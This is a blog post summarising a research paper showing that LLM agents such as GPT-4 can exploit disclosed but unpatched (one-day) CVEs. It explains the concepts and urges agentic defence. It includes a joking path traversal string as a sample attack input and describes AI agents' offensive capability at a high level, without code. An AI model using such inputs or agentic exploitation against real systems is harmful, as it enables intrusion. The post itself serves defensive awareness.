Research Paper Dissection - LLM agents exploit 1day vulns

Research Paper Dissection - LLM agents exploit 1day vulns
Photo by 隔壁光头老王 WangMing'Photo

This entire post is based on the research paper by:

Richard Fang, Rohan Bindu, Akul Gupta, Daniel Kang

The paper was referenced in a previous post. The post is one of many experiments describing detection and exploitation automation using GenAI. Part 2 is the latest:

Detection with GenAI (Part 2): CrushFTP (CVE-2024-4040)
The second in a series of GenAI experiments for prevention, detection and response. This exercise was the ITWeb Security Summit Hackathon #SS24Hack second day challenge for the Snode Technologies Blue Team GenAI CTF (capture the flag) event. Anyone should be able to do it; even if you have not used

The rise in LLM performance is driving deeper interest in LLM agents and their capabilities. The paper suggests that all prior research in this space focuses on "simple" vulnerabilities. I must admit, my own series of articles - started with a path traversal exploit - so, this is true. However, contrary to the paper suggesting that most work is performed against "toy" targets, I focused on recent (2024) "real-world" CVEs.

What??? Are path traversals are still possible in 2024?../../../../../../../ 4.sheezy!

Thanks to Stealthcopter (https://sec.stealthcopter.com/intigriti-august-2024-ctf/)

In this post we will cover the following:

  1. Most notable - concepts;
  2. Most notable - findings; &
  3. All important - so what?

Key Concepts

n-day (0-day, 1-day) exploits

You may have come across the term "zero day", "Oday" or "0-day" in the past. Simply put, this is a vulnerability with no vendor fix (patch) since the vendor:

  1. Doesn't know about it yet;
  2. Doesn't care about it; or
  3. Is still finding a fix for it.

Traditionally (in the olden days) it referred to the number of days the vendor had to fix an issue before the vulnerability (PoC exploit) was disclosed. The paper describes one-day vulnerabilities as: "vulnerabilities that have been disclosed but not patched in a system". Personally, I find "patch-diffing" analysis and exploitation most interesting:

Understanding the ConnectWise ScreenConnect CVE-2024-1709 & CVE-2024-1708 | Huntress
This blog discusses the Huntress Team’s analysis efforts of the two vulnerabilities and software weaknesses in ConnectWise ScreenConnect (CVE-2024-1708 and CVE-2024-1709) and the technical details behind this attack.

Granted this is not a binary diff - it's still pretty cool!

LLM agent

An LLM agent is an application of an LLM to reason, plan and execute from problem to solution. Agents typically have access to additional planning, memory and tooling. Augmenting bespoke agents, for example with a RAG pipeline, can produce powerful, autonomous, highly-focused LLM-based solutions. The paper describes such an agent:

Figure 1. LLM Agent (shown in: https://arxiv.org/pdf/2404.08144)

Key findings

The results

In summary, it's possible (and I agree with this finding). Some cases may more difficult than others and some models may not be able to solve the problem. However, it's possible with the correct model (e.g. GPT4) targeting specific type of vulnerabilities.

In my next article, I'll describe a process for end-to-end discovery to exploitation.


So what?

Firstly, this implies that patch latency, which is already a problem for most, will now become an exponentially bigger issue. As we shift focus to prioritise and reduce the attack surface, using robust methodologies like CTEM, we must gravitate towards a similar agentic approach for defence. An apt cliché: you need to fight fire with fire.

If you would like more information on AI Defence Tech contact Snode Technologies.